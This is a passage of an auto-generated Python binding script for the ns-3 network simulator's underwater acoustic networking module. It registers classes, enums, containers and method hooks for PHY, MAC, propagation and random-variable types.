module.add_class('UanPhyCalcSinrDefault', parent=root_module['ns3::UanPhyCalcSinr'])
## uan-phy-dual.h (module 'uan'): ns3::UanPhyCalcSinrDual [class]
module.add_class('UanPhyCalcSinrDual', parent=root_module['ns3::UanPhyCalcSinr'])
## uan-phy-gen.h (module 'uan'): ns3::UanPhyCalcSinrFhFsk [class]
module.add_class('UanPhyCalcSinrFhFsk', parent=root_module['ns3::UanPhyCalcSinr'])
## uan-phy-dual.h (module 'uan'): ns3::UanPhyDual [class]
module.add_class('UanPhyDual', parent=root_module['ns3::UanPhy'])
## uan-phy-gen.h (module 'uan'): ns3::UanPhyGen [class]
module.add_class('UanPhyGen', parent=root_module['ns3::UanPhy'])
## uan-phy.h (module 'uan'): ns3::UanPhyPer [class]
module.add_class('UanPhyPer', parent=root_module['ns3::Object'])
## uan-phy-gen.h (module 'uan'): ns3::UanPhyPerGenDefault [class]
module.add_class('UanPhyPerGenDefault', parent=root_module['ns3::UanPhyPer'])
## uan-phy-gen.h (module 'uan'): ns3::UanPhyPerUmodem [class]
module.add_class('UanPhyPerUmodem', parent=root_module['ns3::UanPhyPer'])
## uan-prop-model.h (module 'uan'): ns3::UanPropModel [class]
module.add_class('UanPropModel', parent=root_module['ns3::Object'])
## uan-prop-model-ideal.h (module 'uan'): ns3::UanPropModelIdeal [class]
module.add_class('UanPropModelIdeal', parent=root_module['ns3::UanPropModel'])
## uan-prop-model-thorp.h (module 'uan'): ns3::UanPropModelThorp [class]
module.add_class('UanPropModelThorp', parent=root_module['ns3::UanPropModel'])
## uan-transducer.h (module 'uan'): ns3::UanTransducer [class]
module.add_class('UanTransducer', parent=root_module['ns3::Object'])
## uan-transducer.h (module 'uan'): ns3::UanTransducer::State [enumeration]
module.add_enum('State', ['TX', 'RX'], outer_class=root_module['ns3::UanTransducer'])
## uan-transducer-hd.h (module 'uan'): ns3::UanTransducerHd [class]
module.add_class('UanTransducerHd', parent=root_module['ns3::UanTransducer'])
## random-variable-stream.h (module 'core'): ns3::UniformRandomVariable [class]
module.add_class('UniformRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream'])
## random-variable-stream.h (module 'core'): ns3::WeibullRandomVariable [class]
module.add_class('WeibullRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream'])
## random-variable-stream.h (module 'core'): ns3::ZetaRandomVariable [class]
module.add_class('ZetaRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream'])
## random-variable-stream.h (module 'core'): ns3::ZipfRandomVariable [class]
module.add_class('ZipfRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream'])
## attribute.h (module 'core'): ns3::AttributeAccessor [class]
module.add_class('AttributeAccessor', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >'])
## attribute.h (module 'core'): ns3::AttributeChecker [class]
module.add_class('AttributeChecker', allow_subclassing=False, automatic_type_narrowing=True, import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >'])
## attribute.h (module 'core'): ns3::AttributeValue [class]
module.add_class('AttributeValue', allow_subclassing=False, automatic_type_narrowing=True, import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >'])
## boolean.h (module 'core'): ns3::BooleanChecker [class]
module.add_class('BooleanChecker', import_from_module='ns.core', parent=root_module['ns3::AttributeChecker'])
## boolean.h (module 'core'): ns3::BooleanValue [class]
module.add_class('BooleanValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
## callback.h (module 'core'): ns3::CallbackChecker [class]
module.add_class('CallbackChecker', import_from_module='ns.core', parent=root_module['ns3::AttributeChecker'])
## callback.h (module 'core'): ns3::CallbackImplBase [class]
module.add_class('CallbackImplBase', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >'])
## callback.h (module 'core'): ns3::CallbackValue [class]
module.add_class('CallbackValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
## channel.h (module 'network'): ns3::Channel [class]
module.add_class('Channel', import_from_module='ns.network', parent=root_module['ns3::Object'])
## random-variable-stream.h (module 'core'): ns3::ConstantRandomVariable [class]
module.add_class('ConstantRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream'])
## random-variable-stream.h (module 'core'): ns3::DeterministicRandomVariable [class]
module.add_class('DeterministicRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream'])
## device-energy-model.h (module 'energy'): ns3::DeviceEnergyModel [class]
module.add_class('DeviceEnergyModel', import_from_module='ns.energy', parent=root_module['ns3::Object'])
## double.h (module 'core'): ns3::DoubleValue [class]
module.add_class('DoubleValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
## random-variable-stream.h (module 'core'): ns3::EmpiricalRandomVariable [class]
module.add_class('EmpiricalRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream'])
## attribute.h (module 'core'): ns3::EmptyAttributeValue [class]
module.add_class('EmptyAttributeValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
## energy-source.h (module 'energy'): ns3::EnergySource [class]
module.add_class('EnergySource', import_from_module='ns.energy', parent=root_module['ns3::Object'])
## energy-source-container.h (module 'energy'): ns3::EnergySourceContainer [class]
module.add_class('EnergySourceContainer', import_from_module='ns.energy', parent=root_module['ns3::Object'])
## enum.h (module 'core'): ns3::EnumChecker [class]
module.add_class('EnumChecker', import_from_module='ns.core', parent=root_module['ns3::AttributeChecker'])
## enum.h (module 'core'): ns3::EnumValue [class]
module.add_class('EnumValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
## random-variable-stream.h (module 'core'): ns3::ErlangRandomVariable [class]
module.add_class('ErlangRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream'])
## event-impl.h (module 'core'): ns3::EventImpl [class]
module.add_class('EventImpl', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::EventImpl, ns3::empty, ns3::DefaultDeleter<ns3::EventImpl> >'])
## random-variable-stream.h (module 'core'): ns3::ExponentialRandomVariable [class]
module.add_class('ExponentialRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream'])
## random-variable-stream.h (module 'core'): ns3::GammaRandomVariable [class]
module.add_class('GammaRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream'])
## integer.h (module 'core'): ns3::IntegerValue [class]
module.add_class('IntegerValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
## ipv4-address.h (module 'network'): ns3::Ipv4AddressChecker [class]
module.add_class('Ipv4AddressChecker', import_from_module='ns.network', parent=root_module['ns3::AttributeChecker'])
## ipv4-address.h (module 'network'): ns3::Ipv4AddressValue [class]
module.add_class('Ipv4AddressValue', import_from_module='ns.network', parent=root_module['ns3::AttributeValue'])
## ipv4-address.h (module 'network'): ns3::Ipv4MaskChecker [class]
module.add_class('Ipv4MaskChecker', import_from_module='ns.network', parent=root_module['ns3::AttributeChecker'])
## ipv4-address.h (module 'network'): ns3::Ipv4MaskValue [class]
module.add_class('Ipv4MaskValue', import_from_module='ns.network', parent=root_module['ns3::AttributeValue'])
## ipv6-address.h (module 'network'): ns3::Ipv6AddressChecker [class]
module.add_class('Ipv6AddressChecker', import_from_module='ns.network', parent=root_module['ns3::AttributeChecker'])
## ipv6-address.h (module 'network'): ns3::Ipv6AddressValue [class]
module.add_class('Ipv6AddressValue', import_from_module='ns.network', parent=root_module['ns3::AttributeValue'])
## ipv6-address.h (module 'network'): ns3::Ipv6PrefixChecker [class]
module.add_class('Ipv6PrefixChecker', import_from_module='ns.network', parent=root_module['ns3::AttributeChecker'])
## ipv6-address.h (module 'network'): ns3::Ipv6PrefixValue [class]
module.add_class('Ipv6PrefixValue', import_from_module='ns.network', parent=root_module['ns3::AttributeValue'])
## random-variable-stream.h (module 'core'): ns3::LogNormalRandomVariable [class]
module.add_class('LogNormalRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream'])
## mobility-model.h (module 'mobility'): ns3::MobilityModel [class]
module.add_class('MobilityModel', import_from_module='ns.mobility', parent=root_module['ns3::Object'])
## net-device.h (module 'network'): ns3::NetDevice [class]
module.add_class('NetDevice', import_from_module='ns.network', parent=root_module['ns3::Object'])
## net-device.h (module 'network'): ns3::NetDevice::PacketType [enumeration]
module.add_enum('PacketType', ['PACKET_HOST', 'NS3_PACKET_HOST', 'PACKET_BROADCAST', 'NS3_PACKET_BROADCAST', 'PACKET_MULTICAST', 'NS3_PACKET_MULTICAST', 'PACKET_OTHERHOST', 'NS3_PACKET_OTHERHOST'], outer_class=root_module['ns3::NetDevice'], import_from_module='ns.network')
## nix-vector.h (module 'network'): ns3::NixVector [class]
module.add_class('NixVector', import_from_module='ns.network', parent=root_module['ns3::SimpleRefCount< ns3::NixVector, ns3::empty, ns3::DefaultDeleter<ns3::NixVector> >'])
## node.h (module 'network'): ns3::Node [class]
module.add_class('Node', import_from_module='ns.network', parent=root_module['ns3::Object'])
## random-variable-stream.h (module 'core'): ns3::NormalRandomVariable [class]
module.add_class('NormalRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream'])
## object-factory.h (module 'core'): ns3::ObjectFactoryChecker [class]
module.add_class('ObjectFactoryChecker', import_from_module='ns.core', parent=root_module['ns3::AttributeChecker'])
## object-factory.h (module 'core'): ns3::ObjectFactoryValue [class]
module.add_class('ObjectFactoryValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
## packet.h (module 'network'): ns3::Packet [class]
module.add_class('Packet', import_from_module='ns.network', parent=root_module['ns3::SimpleRefCount< ns3::Packet, ns3::empty, ns3::DefaultDeleter<ns3::Packet> >'])
## random-variable-stream.h (module 'core'): ns3::ParetoRandomVariable [class]
module.add_class('ParetoRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream'])
## pointer.h (module 'core'): ns3::PointerChecker [class]
module.add_class('PointerChecker', import_from_module='ns.core', parent=root_module['ns3::AttributeChecker'])
## pointer.h (module 'core'): ns3::PointerValue [class]
module.add_class('PointerValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
## nstime.h (module 'core'): ns3::TimeChecker [class]
module.add_class('TimeChecker', import_from_module='ns.core', parent=root_module['ns3::AttributeChecker'])
## nstime.h (module 'core'): ns3::TimeValue [class]
module.add_class('TimeValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
## type-id.h (module 'core'): ns3::TypeIdChecker [class]
module.add_class('TypeIdChecker', import_from_module='ns.core', parent=root_module['ns3::AttributeChecker'])
## type-id.h (module 'core'): ns3::TypeIdValue [class]
module.add_class('TypeIdValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
## uan-channel.h (module 'uan'): ns3::UanChannel [class]
module.add_class('UanChannel', parent=root_module['ns3::Channel'])
## uan-tx-mode.h (module 'uan'): ns3::UanModesListChecker [class]
module.add_class('UanModesListChecker', parent=root_module['ns3::AttributeChecker'])
## uan-tx-mode.h (module 'uan'): ns3::UanModesListValue [class]
module.add_class('UanModesListValue', parent=root_module['ns3::AttributeValue'])
## uan-net-device.h (module 'uan'): ns3::UanNetDevice [class]
module.add_class('UanNetDevice', parent=root_module['ns3::NetDevice'])
## uinteger.h (module 'core'): ns3::UintegerValue [class]
module.add_class('UintegerValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
## vector.h (module 'core'): ns3::Vector2DChecker [class]
module.add_class('Vector2DChecker', import_from_module='ns.core', parent=root_module['ns3::AttributeChecker'])
## vector.h (module 'core'): ns3::Vector2DValue [class]
module.add_class('Vector2DValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
## vector.h (module 'core'): ns3::Vector3DChecker [class]
module.add_class('Vector3DChecker', import_from_module='ns.core', parent=root_module['ns3::AttributeChecker'])
## vector.h (module 'core'): ns3::Vector3DValue [class]
module.add_class('Vector3DValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
## acoustic-modem-energy-model.h (module 'uan'): ns3::AcousticModemEnergyModel [class]
module.add_class('AcousticModemEnergyModel', parent=root_module['ns3::DeviceEnergyModel'])
## address.h (module 'network'): ns3::AddressChecker [class]
module.add_class('AddressChecker', import_from_module='ns.network', parent=root_module['ns3::AttributeChecker'])
## address.h (module 'network'): ns3::AddressValue [class]
module.add_class('AddressValue', import_from_module='ns.network', parent=root_module['ns3::AttributeValue'])
module.add_container('std::list< std::pair< ns3::Ptr< ns3::Packet >, ns3::UanAddress > >', 'std::pair< ns3::Ptr< ns3::Packet >, ns3::UanAddress >', container_type='list')
module.add_container('std::vector< ns3::Tap >', 'ns3::Tap', container_type='vector')
module.add_container('std::vector< std::complex< double > >', 'std::complex< double >', container_type='vector')
module.add_container('std::vector< double >', 'double', container_type='vector')
module.add_container('std::set< unsigned char >', 'unsigned char', container_type='set')
module.add_container('std::list< ns3::UanPacketArrival >', 'ns3::UanPacketArrival', container_type='list')
module.add_container('std::list< ns3::Ptr< ns3::UanPhy > >', 'ns3::Ptr< ns3::UanPhy >', container_type='list')
module.add_container('std::vector< std::pair< ns3::Ptr< ns3::UanNetDevice >, ns3::Ptr< ns3::UanTransducer > > >', 'std::pair< ns3::Ptr< ns3::UanNetDevice >, ns3::Ptr< ns3::UanTransducer > >', container_type='vector')
module.add_container('std::list< ns3::Ptr< ns3::UanTransducer > >', 'ns3::Ptr< ns3::UanTransducer >', container_type='list')
typehandlers.add_type_alias('ns3::Vector3D', 'ns3::Vector')
typehandlers.add_type_alias('ns3::Vector3D*', 'ns3::Vector*')
typehandlers.add_type_alias('ns3::Vector3D&', 'ns3::Vector&')
module.add_typedef(root_module['ns3::Vector3D'], 'Vector')
typehandlers.add_type_alias('ns3::Vector3DValue', 'ns3::VectorValue')
typehandlers.add_type_alias('ns3::Vector3DValue*', 'ns3::VectorValue*')
typehandlers.add_type_alias('ns3::Vector3DValue&', 'ns3::VectorValue&')
module.add_typedef(root_module['ns3::Vector3DValue'], 'VectorValue')
typehandlers.add_type_alias('ns3::Vector3DChecker', 'ns3::VectorChecker')
typehandlers.add_type_alias('ns3::Vector3DChecker*', 'ns3::VectorChecker*')
typehandlers.add_type_alias('ns3::Vector3DChecker&', 'ns3::VectorChecker&')
module.add_typedef(root_module['ns3::Vector3DChecker'], 'VectorChecker')
## Register a nested module for the namespace FatalImpl
nested_module = module.add_cpp_namespace('FatalImpl')
register_types_ns3_FatalImpl(nested_module)
## Register a nested module for the namespace internal
nested_module = module.add_cpp_namespace('internal')
register_types_ns3_internal(nested_module)
def register_types_ns3_FatalImpl(module):
root_module = module.get_root()
def register_types_ns3_internal(module):
root_module = module.get_root()
def register_methods(root_module):
register_Ns3Address_methods(root_module, root_module['ns3::Address'])
register_Ns3AttributeConstructionList_methods(root_module, root_module['ns3::AttributeConstructionList'])
register_Ns3AttributeConstructionListItem_methods(root_module, root_module['ns3::AttributeConstructionList::Item'])
register_Ns3Buffer_methods(root_module, root_module['ns3::Buffer'])
register_Ns3BufferIterator_methods(root_module, root_module['ns3::Buffer::Iterator'])
register_Ns3ByteTagIterator_methods(root_module, root_module['ns3::ByteTagIterator'])
register_Ns3ByteTagIteratorItem_methods(root_module, root_module['ns3::ByteTagIterator::Item'])
register_Ns3ByteTagList_methods(root_module, root_module['ns3::ByteTagList'])
register_Ns3ByteTagListIterator_methods(root_module, root_module['ns3::ByteTagList::Iterator'])
register_Ns3ByteTagListIteratorItem_methods(root_module, root_module['ns3::ByteTagList::Iterator::Item'])
register_Ns3CallbackBase_methods(root_module, root_module['ns3::CallbackBase'])
register_Ns3DeviceEnergyModelContainer_methods(root_module, root_module['ns3::DeviceEnergyModelContainer'])
register_Ns3DeviceEnergyModelHelper_methods(root_module, root_module['ns3::DeviceEnergyModelHelper'])
register_Ns3EnergySourceHelper_methods(root_module, root_module['ns3::EnergySourceHelper'])
register_Ns3EventId_methods(root_module, root_module['ns3::EventId'])
register_Ns3Ipv4Address_methods(root_module, root_module['ns3::Ipv4Address'])
register_Ns3Ipv4Mask_methods(root_module, root_module['ns3::Ipv4Mask'])
register_Ns3Ipv6Address_methods(root_module, root_module['ns3::Ipv6Address'])
register_Ns3Ipv6Prefix_methods(root_module, root_module['ns3::Ipv6Prefix'])
register_Ns3NetDeviceContainer_methods(root_module, root_module['ns3::NetDeviceContainer'])
register_Ns3NodeContainer_methods(root_module, root_module['ns3::NodeContainer'])
register_Ns3ObjectBase_methods(root_module, root_module['ns3::ObjectBase'])
register_Ns3ObjectDeleter_methods(root_module, root_module['ns3::ObjectDeleter'])
register_Ns3ObjectFactory_methods(root_module, root_module['ns3::ObjectFactory'])
register_Ns3PacketMetadata_methods(root_module, root_module['ns3::PacketMetadata'])
register_Ns3PacketMetadataItem_methods(root_module, root_module['ns3::PacketMetadata::Item'])
register_Ns3PacketMetadataItemIterator_methods(root_module, root_module['ns3::PacketMetadata::ItemIterator'])
register_Ns3PacketTagIterator_methods(root_module, root_module['ns3::PacketTagIterator'])
register_Ns3PacketTagIteratorItem_methods(root_module, root_module['ns3::PacketTagIterator::Item'])
register_Ns3PacketTagList_methods(root_module, root_module['ns3::PacketTagList'])
register_Ns3PacketTagListTagData_methods(root_module, root_module['ns3::PacketTagList::TagData'])
register_Ns3Reservation_methods(root_module, root_module['ns3::Reservation'])
register_Ns3SimpleRefCount__Ns3Object_Ns3ObjectBase_Ns3ObjectDeleter_methods(root_module, root_module['ns3::SimpleRefCount< ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter >'])
register_Ns3Simulator_methods(root_module, root_module['ns3::Simulator'])
register_Ns3Tag_methods(root_module, root_module['ns3::Tag'])
register_Ns3TagBuffer_methods(root_module, root_module['ns3::TagBuffer'])
register_Ns3Tap_methods(root_module, root_module['ns3::Tap'])
register_Ns3TracedValue__Double_methods(root_module, root_module['ns3::TracedValue< double >'])
register_Ns3TypeId_methods(root_module, root_module['ns3::TypeId'])
register_Ns3TypeIdAttributeInformation_methods(root_module, root_module['ns3::TypeId::AttributeInformation'])
register_Ns3TypeIdTraceSourceInformation_methods(root_module, root_module['ns3::TypeId::TraceSourceInformation'])
register_Ns3UanAddress_methods(root_module, root_module['ns3::UanAddress'])
register_Ns3UanHelper_methods(root_module, root_module['ns3::UanHelper'])
register_Ns3UanModesList_methods(root_module, root_module['ns3::UanModesList'])
register_Ns3UanPacketArrival_methods(root_module, root_module['ns3::UanPacketArrival'])
register_Ns3UanPdp_methods(root_module, root_module['ns3::UanPdp'])
register_Ns3UanPhyListener_methods(root_module, root_module['ns3::UanPhyListener'])
register_Ns3UanTxMode_methods(root_module, root_module['ns3::UanTxMode'])
register_Ns3UanTxModeFactory_methods(root_module, root_module['ns3::UanTxModeFactory'])
register_Ns3Vector2D_methods(root_module, root_module['ns3::Vector2D'])
register_Ns3Vector3D_methods(root_module, root_module['ns3::Vector3D'])
register_Ns3Empty_methods(root_module, root_module['ns3::empty'])
register_Ns3Int64x64_t_methods(root_module, root_module['ns3::int64x64_t'])
register_Ns3AcousticModemEnergyModelHelper_methods(root_module, root_module['ns3::AcousticModemEnergyModelHelper'])
register_Ns3Chunk_methods(root_module, root_module['ns3::Chunk'])
register_Ns3Header_methods(root_module, root_module['ns3::Header'])
register_Ns3Object_methods(root_module, root_module['ns3::Object'])
register_Ns3ObjectAggregateIterator_methods(root_module, root_module['ns3::Object::AggregateIterator'])
register_Ns3RandomVariableStream_methods(root_module, root_module['ns3::RandomVariableStream'])
register_Ns3SequentialRandomVariable_methods(root_module, root_module['ns3::SequentialRandomVariable'])
register_Ns3SimpleRefCount__Ns3AttributeAccessor_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeAccessor__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >'])
register_Ns3SimpleRefCount__Ns3AttributeChecker_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeChecker__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >'])
register_Ns3SimpleRefCount__Ns3AttributeValue_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeValue__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >'])
register_Ns3SimpleRefCount__Ns3CallbackImplBase_Ns3Empty_Ns3DefaultDeleter__lt__ns3CallbackImplBase__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >'])
register_Ns3SimpleRefCount__Ns3EventImpl_Ns3Empty_Ns3DefaultDeleter__lt__ns3EventImpl__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::EventImpl, ns3::empty, ns3::DefaultDeleter<ns3::EventImpl> >'])
register_Ns3SimpleRefCount__Ns3NixVector_Ns3Empty_Ns3DefaultDeleter__lt__ns3NixVector__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::NixVector, ns3::empty, ns3::DefaultDeleter<ns3::NixVector> >'])
register_Ns3SimpleRefCount__Ns3Packet_Ns3Empty_Ns3DefaultDeleter__lt__ns3Packet__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::Packet, ns3::empty, ns3::DefaultDeleter<ns3::Packet> >'])
register_Ns3SimpleRefCount__Ns3TraceSourceAccessor_Ns3Empty_Ns3DefaultDeleter__lt__ns3TraceSourceAccessor__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >'])
register_Ns3Time_methods(root_module, root_module['ns3::Time'])
register_Ns3TraceSourceAccessor_methods(root_module, root_module['ns3::TraceSourceAccessor'])
register_Ns3Trailer_methods(root_module, root_module['ns3::Trailer'])
register_Ns3TriangularRandomVariable_methods(root_module, root_module['ns3::TriangularRandomVariable'])
register_Ns3UanHeaderCommon_methods(root_module, root_module['ns3::UanHeaderCommon'])
register_Ns3UanHeaderRcAck_methods(root_module, root_module['ns3::UanHeaderRcAck'])
register_Ns3UanHeaderRcCts_methods(root_module, root_module['ns3::UanHeaderRcCts'])
register_Ns3UanHeaderRcCtsGlobal_methods(root_module, root_module['ns3::UanHeaderRcCtsGlobal'])
register_Ns3UanHeaderRcData_methods(root_module, root_module['ns3::UanHeaderRcData'])
register_Ns3UanHeaderRcRts_methods(root_module, root_module['ns3::UanHeaderRcRts'])
register_Ns3UanMac_methods(root_module, root_module['ns3::UanMac'])
register_Ns3UanMacAloha_methods(root_module, root_module['ns3::UanMacAloha'])
register_Ns3UanMacCw_methods(root_module, root_module['ns3::UanMacCw'])
register_Ns3UanMacRc_methods(root_module, root_module['ns3::UanMacRc'])
register_Ns3UanMacRcGw_methods(root_module, root_module['ns3::UanMacRcGw'])
register_Ns3UanNoiseModel_methods(root_module, root_module['ns3::UanNoiseModel'])
register_Ns3UanNoiseModelDefault_methods(root_module, root_module['ns3::UanNoiseModelDefault'])
register_Ns3UanPhy_methods(root_module, root_module['ns3::UanPhy'])
register_Ns3UanPhyCalcSinr_methods(root_module, root_module['ns3::UanPhyCalcSinr'])
register_Ns3UanPhyCalcSinrDefault_methods(root_module, root_module['ns3::UanPhyCalcSinrDefault'])
register_Ns3UanPhyCalcSinrDual_methods(root_module, root_module['ns3::UanPhyCalcSinrDual'])
register_Ns3UanPhyCalcSinrFhFsk_methods(root_module, root_module['ns3::UanPhyCalcSinrFhFsk'])
register_Ns3UanPhyDual_methods(root_module, root_module['ns3::UanPhyDual'])
register_Ns3UanPhyGen_methods(root_module, root_module['ns3::UanPhyGen'])
register_Ns3UanPhyPer_methods(root_module, root_module['ns3::UanPhyPer'])
register_Ns3UanPhyPerGenDefault_methods(root_module, root_module['ns3::UanPhyPerGenDefault'])
register_Ns3UanPhyPerUmodem_methods(root_module, root_module['ns3::UanPhyPerUmodem'])
register_Ns3UanPropModel_methods(root_module, root_module['ns3::UanPropModel'])
register_Ns3UanPropModelIdeal_methods(root_module, root_module['ns3::UanPropModelIdeal'])
register_Ns3UanPropModelThorp_methods(root_module, root_module['ns3::UanPropModelThorp'])
register_Ns3UanTransducer_methods(root_module, root_module['ns3::UanTransducer'])
register_Ns3UanTransducerHd_methods(root_module, root_module['ns3::UanTransducerHd'])
register_Ns3UniformRandomVariable_methods(root_module, root_module['ns3::UniformRandomVariable'])
register_Ns3WeibullRandomVariable_methods(root_module, root_module['ns3::WeibullRandomVariable'])
register_Ns3ZetaRandomVariable_methods(root_module, root_module['ns3::ZetaRandomVariable'])
register_Ns3ZipfRandomVariable_methods(root_module, root_module['ns3::ZipfRandomVariable'])
register_Ns3AttributeAccessor_methods(root_module, root_module['ns3::AttributeAccessor'])
register_Ns3AttributeChecker_methods(root_module, root_module['ns3::AttributeChecker'])
register_Ns3AttributeValue_methods(root_module, root_module['ns3::AttributeValue'])
register_Ns3BooleanChecker_methods(root_module, root_module['ns3::BooleanChecker'])
register_Ns3BooleanValue_methods(root_module, root_module['ns3::BooleanValue'])
register_Ns3CallbackChecker_methods(root_module, root_module['ns3::CallbackChecker'])
register_Ns3CallbackImplBase_methods(root_module, root_module['ns3::CallbackImplBase'])
register_Ns3CallbackValue_methods(root_module, root_module['ns3::CallbackValue'])
register_Ns3Channel_methods(root_module, root_module['ns3::Channel'])
register_Ns3ConstantRandomVariable_methods(root_module, root_module['ns3::ConstantRandomVariable'])
register_Ns3DeterministicRandomVariable_methods(root_module, root_module['ns3::DeterministicRandomVariable'])
register_Ns3DeviceEnergyModel_methods(root_module, root_module['ns3::DeviceEnergyModel'])
register_Ns3DoubleValue_methods(root_module, root_module['ns3::DoubleValue'])
register_Ns3EmpiricalRandomVariable_methods(root_module, root_module['ns3::EmpiricalRandomVariable'])
register_Ns3EmptyAttributeValue_methods(root_module, root_module['ns3::EmptyAttributeValue'])
register_Ns3EnergySource_methods(root_module, root_module['ns3::EnergySource'])
register_Ns3EnergySourceContainer_methods(root_module, root_module['ns3::EnergySourceContainer'])
register_Ns3EnumChecker_methods(root_module, root_module['ns3::EnumChecker'])
register_Ns3EnumValue_methods(root_module, root_module['ns3::EnumValue'])
register_Ns3ErlangRandomVariable_methods(root_module, root_module['ns3::ErlangRandomVariable'])
register_Ns3EventImpl_methods(root_module, root_module['ns3::EventImpl'])
register_Ns3ExponentialRandomVariable_methods(root_module, root_module['ns3::ExponentialRandomVariable'])
register_Ns3GammaRandomVariable_methods(root_module, root_module['ns3::GammaRandomVariable'])
register_Ns3IntegerValue_methods(root_module, root_module['ns3::IntegerValue'])
register_Ns3Ipv4AddressChecker_methods(root_module, root_module['ns3::Ipv4AddressChecker'])
register_Ns3Ipv4AddressValue_methods(root_module, root_module['ns3::Ipv4AddressValue'])
register_Ns3Ipv4MaskChecker_methods(root_module, root_module['ns3::Ipv4MaskChecker'])
register_Ns3Ipv4MaskValue_methods(root_module, root_module['ns3::Ipv4MaskValue'])
register_Ns3Ipv6AddressChecker_methods(root_module, root_module['ns3::Ipv6AddressChecker'])
register_Ns3Ipv6AddressValue_methods(root_module, root_module['ns3::Ipv6AddressValue'])
register_Ns3Ipv6PrefixChecker_methods(root_module, root_module['ns3::Ipv6PrefixChecker'])
register_Ns3Ipv6PrefixValue_methods(root_module, root_module['ns3::Ipv6PrefixValue'])
register_Ns3LogNormalRandomVariable_methods(root_module, root_module['ns3::LogNormalRandomVariable'])
register_Ns3MobilityModel_methods(root_module, root_module['ns3::MobilityModel'])
register_Ns3NetDevice_methods(root_module, root_module['ns3::NetDevice'])
register_Ns3NixVector_methods(root_module, root_module['ns3::NixVector'])
register_Ns3Node_methods(root_module, root_module['ns3::Node'])
register_Ns3NormalRandomVariable_methods(root_module, root_module['ns3::NormalRandomVariable'])
register_Ns3ObjectFactoryChecker_methods(root_module, root_module['ns3::ObjectFactoryChecker'])
register_Ns3ObjectFactoryValue_methods(root_module, root_module['ns3::ObjectFactoryValue'])
register_Ns3Packet_methods(root_module, root_module['ns3::Packet'])
register_Ns3ParetoRandomVariable_methods(root_module, root_module['ns3::ParetoRandomVariable'])
register_Ns3PointerChecker_methods(root_module, root_module['ns3::PointerChecker'])
register_Ns3PointerValue_methods(root_module, root_module['ns3::PointerValue'])
register_Ns3TimeChecker_methods(root_module, root_module['ns3::TimeChecker'])
register_Ns3TimeValue_methods(root_module, root_module['ns3::TimeValue'])
register_Ns3TypeIdChecker_methods(root_module, root_module['ns3::TypeIdChecker'])
register_Ns3TypeIdValue_methods(root_module, root_module['ns3::TypeIdValue'])
register_Ns3UanChannel_methods(root_module, root_module['ns3::UanChannel'])
register_Ns3UanModesListChecker_methods(root_module, root_module['ns3::UanModesListChecker'])
register_Ns3UanModesListValue_methods(root_module, root_module['ns3::UanModesListValue'])
register_Ns3UanNetDevice_methods(root_module, root_module['ns3::UanNetDevice'])
register_Ns3UintegerValue_methods(root_module, root_module['ns3::UintegerValue'])
register_Ns3Vector2DChecker_methods(root_module, root_module['ns3::Vector2DChecker'])
register_Ns3Vector2DValue_methods(root_module, root_module['ns3::Vector2DValue'])
register_Ns3Vector3DChecker_methods(root_module, root_module['ns3::Vector3DChecker'])
register_Ns3Vector3DValue_methods(root_module, root_module['ns3::Vector3DValue'])
register_Ns3AcousticModemEnergyModel_methods(root_module, root_module['ns3::AcousticModemEnergyModel'])
